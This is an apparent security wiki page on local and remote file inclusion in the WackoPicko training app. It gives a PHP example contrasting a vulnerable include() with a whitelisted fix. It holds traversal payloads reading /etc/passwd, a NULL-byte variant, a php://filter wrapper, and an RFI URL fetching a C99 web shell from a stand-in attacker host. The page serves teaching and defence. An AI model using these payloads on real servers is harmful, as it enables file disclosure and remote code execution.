WackoPicko/File-Inclusion
Description
File Inclusion attacks come in two forms:
- Local File Inclusion (LFI). The application passes attacker-controlled input to an include-style function (PHP's include or require), so a directory-traversal string such as ../../../etc/passwd makes it include a file on the server that was never meant to be included. The classic target is /etc/passwd, but the application's own source and configuration files are just as interesting to an attacker.
- Remote File Inclusion (RFI). The same flaw, but the input is a URL, so the server fetches and executes a file hosted by the attacker (for example the C99shell web shell). In PHP this only works when allow_url_include is enabled.
Proof of Concept
Warning
NULL byte injection (appending %00 to the path so that a suffix the application adds, such as ".php", is cut off) no longer works from PHP 5.3.4 onwards: filesystem functions reject any path containing a NULL byte.
How to detect?
How to protect against it?
- Upgrade to the latest version of PHP. PHP 5.3.4 and later reject paths containing a NULL byte, and allow_url_include has defaulted to Off since PHP 5.2.0; keep it Off so that a URL handed to include() is never fetched.
- Never trust user input. Map the parameter onto a whitelist of known pages instead of building a filesystem path from it, and reject the request when the value is not on the list. Sanitising the string (for instance stripping "../") is weaker than a whitelist because of encodings and stream wrappers.
- Limit what the interpreter may read with open_basedir, so that an include that does escape the intended directory still cannot reach /etc/passwd.
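The vulnerable include beside its whitelisted replacement, as an added example in PHP (this is not WackoPicko's own code). The parameter name page, the pages/ directory and the page names are assumed for illustration; the resolver is then run over the payloads discussed above (traversal, traversal with a NULL byte, a remote URL and a php:// stream wrapper) so the difference between the two forms is visible.

```php
<?php
// Added example, not code from WackoPicko. Contrasts an include() that
// trusts a request parameter with one that resolves the parameter against
// a fixed whitelist. The parameter name "page", the pages/ directory and
// the page names are assumptions for illustration.

declare(strict_types=1);

// --- Vulnerable form -------------------------------------------------------
// ?page=../../../../etc/passwd walks out of pages/ (LFI).
// With allow_url_include=On, ?page=http://attacker.example/c99.txt makes the
// interpreter fetch and execute a remote script (RFI).
// Before PHP 5.3.4, ?page=../../../../etc/passwd%00 also cut off the
// ".php" suffix that the code appends.
function includeUntrusted(string $page): void
{
    include 'pages/' . $page . '.php';
}

// --- Hardened form ---------------------------------------------------------
// The request parameter never becomes part of a path. It is only a key into
// a fixed map, so traversal sequences, URL schemes, stream wrappers and NULL
// bytes never reach the filesystem layer at all.
const ALLOWED_PAGES = [
    'home'    => 'pages/home.php',
    'upload'  => 'pages/upload.php',
    'contact' => 'pages/contact.php',
];

function resolvePage(?string $page): ?string
{
    if ($page === null) {
        return ALLOWED_PAGES['home'];
    }
    // Reject anything that is not a short lowercase key before the lookup,
    // so an unexpected value is logged as an attack attempt instead of being
    // silently folded into a default page.
    if (!preg_match('/\A[a-z]{1,32}\z/', $page)) {
        return null;
    }
    return ALLOWED_PAGES[$page] ?? null;
}

function includeTrusted(?string $page): void
{
    $target = resolvePage($page);
    if ($target === null) {
        http_response_code(400);
        // bin2hex keeps NULL bytes and other control characters readable
        // in the log instead of corrupting the log line.
        error_log('rejected page parameter: ' . bin2hex((string) $page));
        return;
    }
    include $target;
}

// --- Run the resolver over constructed probe values -----------------------
$probes = [
    'home',
    '../../../../etc/passwd',
    "../../../../etc/passwd\0",
    'http://attacker.example/c99.txt',
    'php://filter/convert.base64-encode/resource=index',
];
foreach ($probes as $probe) {
    $result = resolvePage($probe);
    printf("%-52s -> %s\n", str_replace("\0", '\0', $probe), $result ?? 'REJECTED');
}
```

Only the first probe resolves to a file; every other value is rejected by the key check before the whitelist lookup, which is why the resolver does not need to know about "../", percent-encoding, NULL bytes or stream wrappers at all. The php://filter probe is included because it shows why checking only for "../" or "http://" is not enough: PHP's own wrappers give an attacker other ways to read source through include().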